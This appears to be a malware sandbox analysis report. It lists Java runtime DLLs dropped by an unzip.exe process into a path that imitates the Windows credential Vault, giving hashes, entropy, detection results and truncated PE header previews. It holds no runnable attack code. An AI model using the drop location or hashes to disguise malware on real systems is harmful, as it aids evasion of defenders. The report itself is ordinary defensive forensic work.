Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...&0.~...........!......................... ...............................@.......a....@.........................`................0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13792
Entropy (8bit):	6.793040757640551
Encrypted:	false
SSDEEP:	192:sTWyhWJWGxVA6VWQ4aWdj7LHAmm2oRanX01k9z3AXm8mhbwo4cS:sTWyhWdxdoPzoRoR9zmAbHS
MD5:	D2DE3B72DF3852C42DF92F0EAAB5FC6D
SHA1:	BF9F850D38FDFFC19AC5DF0D3BEF64D639877944
SHA-256:	4FF5D37CE9AB23D4C58301E1CFF5402856083AF08527FF882C59B31E5E1559BC
SHA-512:	739495DE71A92251AC6AABC4C7C02A41A3828A5F73D250528C198EAF5891C0F8FD9B903D57278267D02A5944E6EC9C9EFBB6691F15A3D737B800FEF7A2821102
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L................!......................... ...............................@............@.........................p...G............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15312
Entropy (8bit):	6.695768553925862
Encrypted:	false
SSDEEP:	384:W8uk1JzNcKSIJWyhWYaabswFNGaR9zCLSv+:W8JcKSG1z7UW9zJ2
MD5:	E7467D04E70F781E9A1C967B4E7B8727
SHA1:	0C0C865357590BDDE1FA1775B4E507FE19CAE24D
SHA-256:	C72B5A3191F0DCDAF3FCDB083461693DB13C6B4CC550A4A14443988BB918519D
SHA-512:	4EBE9D9E1FACB1BC2B1F6F5F8EFC7B871953993CA4112192710DB9FA0BB0F49E3B67BA8ED13F8EE6A4DDB12555CAE331C2C28FD149769D3092712A2FBE26C1D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....h/!...........!......................... ...............................@......2.....@.........................`................0...................%..............T............................................................................text...C........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13320
Entropy (8bit):	6.8554837969676194
Encrypted:	false
SSDEEP:	192:Cs5DfIehWyhW7WGxVA6VWQ42WUvRXC0yUs+OX01k9z3AvqJDrNAz:Cs5DfIehWyhW7xd/Y0iR9z9Zr+z
MD5:	CBEABB6ED3D531D3D683D1A707B0956A
SHA1:	7409BBEAEC549D354B3A9EDDB790B5019A36DFA1
SHA-256:	BA4E69E221FD7EC3F4800D9E3E4B083D960FB1E95EBA210F9F5703DCC9247DB2
SHA-512:	A4A72CA04A1D780D01452D7A0187BB1DC7A23F6C1F5EBB2A9C04DD26E876565B979F1E124538A70C00F637E65CDD2B144B4A518840B3C52E14FC7ADF82A6824A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....4.Z...........!......................... ...............................@......3.....@.........................`................0...................&..............T............................................................................text...:........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12752
Entropy (8bit):	6.7832596761942465
Encrypted:	false
SSDEEP:	192:+/WyhWJWvkJ0f5AbVWQ4OWQhWe725F5CrIYYDX01k9z3AFZ/gGiM2d:+/WyhWxaabN25G7YDR9zu4GWd
MD5:	F2AB2EA59FD9B39E3F093673CFC88F65
SHA1:	8A13D3590DCC188D76483C91E0CB9AD4DE24C8FC
SHA-256:	EB72213C711F92326187C844FE604CB428B0C37C537BC914DDF446933548F238
SHA-512:	50A87DCE28EB2BB272FF575FF6922EC2B41CEB565C9D5D115F5A2F449AABF291345126E54DBC7B2AFE03BE9CAB1E6A5F626DBD3AEDE5BBFF76773D91ECAC9430
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....):1...........!......................... ...............................@............@.........................`................0...................%..............T............................................................................text...5........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.797831298672071
Encrypted:	false
SSDEEP:	192:ueGVWyhWtWGxVA6VWQ4OWCpUtJT8gkO2dPaIAX01k9z3A0DearJ:PGVWyhWpxdsFCOOP5AR9zhCarJ
MD5:	0D5E374940FC119BB915750E8BDCC5F5
SHA1:	FFE697F8E57AA6B0A9B87EAE657AADB9DEFF6755
SHA-256:	1BDFD8D7D14E7515CA05B53E659AC1000853BD3B6C157AC50E4303769B9F9C9F
SHA-512:	8825DE32F25596A3DC193F33DEDF34E8663835C4DB3D9F31C7EEF0E55A3188C5F53BBF46BEFB946F9021C72074F88B6F47B0E7804DF1EEA2C0877C469E1B5CD6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....R.............!......................... ...............................@......W.....@.........................`................0...................%..............T............................................................................text...H........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12808
Entropy (8bit):	6.877644843920313
Encrypted:	false
SSDEEP:	192:ByMvhWyhWAVWGxVA6VWQ4+WMz6IVnKaQwP7yX01k9z3ATOJ/J12iO:ByMvhWyhWABxdf6zaHeR9zKC/bXO
MD5:	D182CDA697FF3BD91D9B588C59F64E5C
SHA1:	98ABBCC37F7E040BE515F4BEEF5451860379B4E3
SHA-256:	BEEDCF525E329C691AE4EAF8EDCAAF0A2B1C87D974191C1353523BB063F7B9EA
SHA-512:	40EEE681BAF53214403CC517B7ADAC303160C567EC6076D490984B68689251697569BD97E458FE3D145482F71296ED00D87DE5D3202F385C5267219D6168DA59
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...&./&...........!......................... ...............................@............@.........................`................0...................&..............T............................................................................text...R........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14816
Entropy (8bit):	6.762148670964018
Encrypted:	false
SSDEEP:	384:OdAdv3V0dfpkXc0vVaXWyhWTxdINrR9z2fAjv:OdAdv3VqpkXc0vVa1U2N99z2Yj
MD5:	640E7600DE26CDFE6189D5385CCA9645
SHA1:	95770B622E49A94A22E2CB7B81F26EAB3033A8AB
SHA-256:	FDCD4342FBA9E1679A66CD3E2C02657C0CDBA8F59AF00DF553A7EAFFF097A837
SHA-512:	71003231203442255A1FE504C9FBB4655442E47151F9BB54037FD3AEE6FC51CF7912921357FDE92E8CBF6B1716F19D106DFEFA8C8CE09A6E942426DAD7D64B42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...>.............!......................... ...............................@............@.........................`...V............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13280
Entropy (8bit):	6.893820010362846
Encrypted:	false
SSDEEP:	192:B5tZ3QWyhWznPWGxVA6VWQ4aW5QOFnAmm2oRanX01k9z3AXmU921:XtZ3QWyhWz3xdVubzoRoR9zmd921
MD5:	D7DDFD46D49CA786B744459B5412AD6E
SHA1:	D9714D73CFFEEFC58F6A86700814B868D7F2190A
SHA-256:	2B644DF6A2088CC8CD6431D0E2FDB11AFE87D81E15825D3C6D185A65C6DA02BB
SHA-512:	09F21C187BD92D7FADBB4CA03C075517C7D3D0C1838E56C1EC8E79D40B96253AACC59166EA246F73F6CC2A9FF87606E054A1DD9EE07460904444B34CCC6648E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...{..............!......................... ...............................@......-Y....@.........................`...v............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13792
Entropy (8bit):	6.791376623898572
Encrypted:	false
SSDEEP:	192:xrWKIMFsWyhW3WGxVA6VWQ4aWWthyO9Amm2oRanX01k9z3AXmZgO:xC5WyhWPxdHhFzoRoR9zmFO
MD5:	03830BF17C670706428088D28AA3B2EF
SHA1:	9A0E764BD420E9C19A81D09A4DF0EE9BB935ABE5
SHA-256:	A5D00D9F6D33398AF2124DADBAAB5CCA1ECAEBE9182CCDF2928BFCE6421C3678
SHA-512:	580246B5D91A0C92F68AEBFFC0CC9285DF2E53C5B5F3863FB8E442670C3F8A3B96C783C3AE749039A6C250F18B7C0E4AA3671B2AB262F2DE5B6201F6D75D217E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....u.............!......................... ...............................@.......W....@.........................`...E............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13280
Entropy (8bit):	6.8857787715398
Encrypted:	false
SSDEEP:	192:rgkHWyhWRWGxVA6VWQ4OWBj4yGI+X01k9z3ARfQvKbf:NHWyhW1xdpNrR9z2fAK
MD5:	453F0EFE3FA809E6B72EDC284C9761C6
SHA1:	20D1E32EB91CA6593F85C1DA94A3A112F6CF2AA9
SHA-256:	75C658123142960FE01C1DEB09BD06F6517E816144CF9654E107A26009E075F9
SHA-512:	3E4715CC565CFF0925D6B848BE811C89BAE7DC55AC367544B9D937A6BB4686377FDB8A65F506687CD8A4D259451241647964876DD532E3F43C1078BB1BCF77CB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L..................!......................... ...............................@.......W....@.........................`...E............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12768
Entropy (8bit):	6.823139787756416
Encrypted:	false
SSDEEP:	192:IggWyhWLWGxVA6VWQ4OW0BDdnO2dPaIAX01k9z3A0Dea0ag:IggWyhWrxd5ZOOP5AR9zhCa05
MD5:	FF064B84499807F2E52F6B60F8DAF11F
SHA1:	119E6CD2B41EFF9DEE12049C6F51F6A004065E9A
SHA-256:	9F9F6C09A0FB3F3D54083E932E510FA0DE54361B40B74DD8C15AE4D049A52DB6
SHA-512:	CBBBF4E8FBA7547D6989666E2238826F7ECBA989F2087CE53DA899930D1AF4BE874E827321FCEF3889D255C52BD131C4C4F91F3D5B3A1E63ABD7D48F894D30BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...fI.............!......................... ...............................@......v,....@.........................`...9............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13784
Entropy (8bit):	6.822447743747524
Encrypted:	false
SSDEEP:	192:xnYmaWyhWqwyEWGxVA6VWQ4eWE1fcyGI+X01k9z3ARfQvFYuXC:iWyhWqwRxddcNrR9z2fAFFXC
MD5:	476297D1E99C9EACC7CF681741FED6E5
SHA1:	2072A3C0B7E4BF5E510182AFEB5EDF4D5038B544
SHA-256:	DD20F8422D8FA5AA61251EF1F95D97F8DB7830E295468CAE813B7CD3BDB70725
SHA-512:	51CF3A09EB4D12DB832E5E6BC851831A52FA5D7475FC841DF837ED511292B9C6E895D9958A4C9BA8693588FDB5DBD29230E94D482FF762085AE810F53EED997F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....).C...........!......................... ...............................@......).....@.........................`................0...................%..............T............................................................................text...P........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16864
Entropy (8bit):	6.614813279641915
Encrypted:	false
SSDEEP:	192:uT7cyNWyhWEWGxVA6VWQ4OWRBBBsPyGI+X01k9z3ARfQvlZgV:uTgyNWyhW0xdwcNrR9z2fAlZg
MD5:	4D44F878D747363C6A34BF3609BBD663
SHA1:	C2D65908A8A09D2BA44E974E3BAB3E82134DC3DD
SHA-256:	1CAB0FF3B24A091320BE1AA21BAE6B080009C0F5A23E5FB963AC966645151FBE
SHA-512:	4AA2F72DEFD2F8FD88C59AC91B0AF92FC435A87C48C446A318B3FE2080C7FEA469F3F1E350A76BD391B09CE7D7CF8A48EB4E02F3D30EF4999920DCCA18AD38EC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....3...........!.........................0...............................P......ob....@.........................p................@...................%..............T............................................................................text...^........................... ..`.data...@....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13264
Entropy (8bit):	6.791133124535234
Encrypted:	false
SSDEEP:	192:p9WyhWadWvkJ0f5AbVWQ4OW0IV1vyGI+X01k9z3ARfQvwGEmz:p9WyhWataabrwNrR9z2fAwDmz
MD5:	06581CAA794C774D61BA8BBE9154C2D2
SHA1:	6CF333AA4F588E6501D0EA07018F6CF11F918565
SHA-256:	602E8908942D250A61C991A5F13232533B0ADB8F09F0394CD83473D257556E45
SHA-512:	B0FF7D29CC339E0556332CEA491F38DED1BE0A741B90441178642BF8559FE268D2567976181EC3CA42C2363275962E040297A1B5EF9433B71C8F96251B0B87F5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....&~............!......................... ...............................@......t.....@.........................p..."............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15368
Entropy (8bit):	6.687840697295609
Encrypted:	false
SSDEEP:	384:anWm5CVWyhW0xdYaL+Hj+R9zQ/cZ6wQl6:anWm5C/rF6Hji9zmcQwN
MD5:	C03E51D51D33076F2417171435914902
SHA1:	D94FCEB37C65FFF4348B7B37E3AA6C3C2B468B9D
SHA-256:	189E895F3D7D65FE94BA46EB1A1E950761BE23859DD280BF4FAA481A52805C1F
SHA-512:	EEF9399BE96ADFB581B1605D4F9E7CECC4A9B499C5554A399E48BBA70697D025276E9AF009A81CCF18FF8563DCF29446DA3070FEAA745CECACC4DEB99A0D05CC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L..................!......................... ...............................@......=*....@.........................p................0...................&..............T............................................................................text... ........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13792
Entropy (8bit):	6.769307028010619
Encrypted:	false
SSDEEP:	192:JeY17aFBR4WyhWRWGxVA6VWQ4aWfIOLQg2VAmm2oRanX01k9z3AXm6iNkL:JzNWyhW1xda3sgOzoRoR9zmlL
MD5:	AD849152885A1A91438CD1D141FA3802
SHA1:	6EFA7DC1CCE6EAC73487AF8EFCF5BD15143D1F65
SHA-256:	927B976F552DFF42EA8AD47C14F9C4993601B721C49612F601C5634496A6FD3D
SHA-512:	BFA20C34BFD72C2EAF5ED99BC87D5E3B951D421490B9C82D005C439F302A705503A104B95B79B46CFE89623C1B9E6C1FA08D332B1169E2C2B8E98DC07CF29F2D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...~..............!......................... ...............................@......ti....@.........................`................0...................%..............T............................................................................text...v........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13280
Entropy (8bit):	6.895391636518714
Encrypted:	false
SSDEEP:	192:0aWyhWnWGxVA6VWQ4OWMOMz+O2dPaIAX01k9z3A0DeawE:jWyhWfxdTqOOP5AR9zhCa
MD5:	FD956E443255C677F917D503F5C391D9
SHA1:	B6CC8EAA10508D212D545A1283BE37533DC1BB9C
SHA-256:	C18BB6ACB0D346E5584390D3F685912CA3371D042BCB775F002F4DF4EE1783B1
SHA-512:	783F14E0613159A33D0EE2040883DE1705129FE199881EB9DC41E9DA091CF338EEA0A0D6B77BA6A470084BD6A08D0F42054F4437B30E0A1692320C6C12EC58EC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L..................!......................... ...............................@............@.........................p...e............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23504
Entropy (8bit):	6.334352334433968
Encrypted:	false
SSDEEP:	384:JCQF2KmbM4Oe5grykfIgTmLyWyhWsaabmijkGER9zG2th:8tMq5grxfInO1zdj+9zhth
MD5:	AC091F3A6DFA5CA6A26EC73672679AAB
SHA1:	0E3490C023940CB684EF2FA105B9997BD4197B89
SHA-256:	89847D24B2A0D1D4D0C4CC8A5AFA2FEB6F6DA5BD66D7DDF15271B8556E6EF210
SHA-512:	439E27630629BC56786B47B9B0B9AB98CB7981BEB176647EBBBFED780E316130AD143AF65FB0604691D51F677DA217BBEB115E02D8ACC6451480239D7412F637
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....U.#...........!.........................@...............................`......V.....@.........................`....+...........P...............6...%..............T............................................................................text...7-.......................... ..`.data...@....@......................@....rsrc........P.......2..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-multibyte-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20944
Entropy (8bit):	6.356256666499611
Encrypted:	false
SSDEEP:	384:H7aLPmIHJI6/CpG3t2G3t4odXL5WyhW4aab3Ba5G7YDR9zuP+r:bwPmIHJI6xxzlKG7Yl9ze+r
MD5:	5A791871B5CA66421F3420E773015470
SHA1:	5930798715CA965FA76DCC3508AF7FD95325B33C
SHA-256:	66E488782ED3E5BC0C4F44195DAA766B4EAFFD0A809951E7DFE27BA1325AE66A
SHA-512:	A0A2306C13A234BD50EB8C7A1C52DEA2C9BEA64A8654AF757836C0FA07D46008DE09E6FEE016869C4A43E2FD7A0E30A6E1576D506CD73AAFE3936A741CD7C327
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....s#............!.....$...................@...............................`......-R....@.........................p.... ...........P...............,...%..............T............................................................................text...d".......$.................. ..`.data...@....@......................@....rsrc........P.......(..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67552
Entropy (8bit):	5.60000504394334
Encrypted:	false
SSDEEP:	1536:h8tFDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPrV/OizX:mrDe5c4bFE2Jy2cvxXWpD9d3334BkZnw
MD5:	CB5FA174E016ED89B63FF5D3F348B540
SHA1:	5DFCAB7D929B3311979AC6F1D767E90F3A7D9857
SHA-256:	7D821CB92C7EA5FB89D3E35F54E3C602CC40EC5BDE777A313044CC081A5F489D
SHA-512:	C64B681C2E162543CE496768EECE104BB179359CC261AC12FDE76716B5B8AFDC9B6D8C0503EECE3CA33EB0737B9E53D732AD840DDB69DD678539A517CD818E0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....W+...........!................................................................Vn....@.........................p....................................%..............T............................................................................text............................... ..`.data...@...........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13776
Entropy (8bit):	6.787734698077625
Encrypted:	false
SSDEEP:	192:gwF5uSqjd7tWyhWXWvkJ0f5AbVWQ4OWSzEFBp5F5CrIYYDX01k9z3AFZuMT/:gcuScWyhWzaabxY5G7YDR9zu3
MD5:	DA537A62AE8E90A95AD6A803BED8304A
SHA1:	965D4262D6F5C180B600C0870D1539CF688C9E02
SHA-256:	4BED1F9CB7CA427C27847F10C4439F6E958B1419D0911F4019890AA70145571E
SHA-512:	FDFDCCBCE597E8BB358AC0287CA5DF0953F773BBA6A6C8B0AC5304C19BDABF3AD6C2373DB5D05BEE1B1F3F0B0C22CD0D4C5D72E3DA2C3A1F26BDB46FB51F675C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L.....x............!......................... ...............................@............@.........................p...x............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17872
Entropy (8bit):	6.535268757953539
Encrypted:	false
SSDEEP:	384:NUYA9ojOShrKAWyhWUaabTDsDeZR9zrLOxNM:M9yPrKIJzLsDU9zvOXM
MD5:	AA7AF0B906336D221759D87DA3CCDF66
SHA1:	1CC4D63B2A51D053B7E9AFAFE32F587DB3284B15
SHA-256:	EECE7489CDF91D14354BDB589FC7555551F043AD0C7BFDF75E39DAA2834DF111
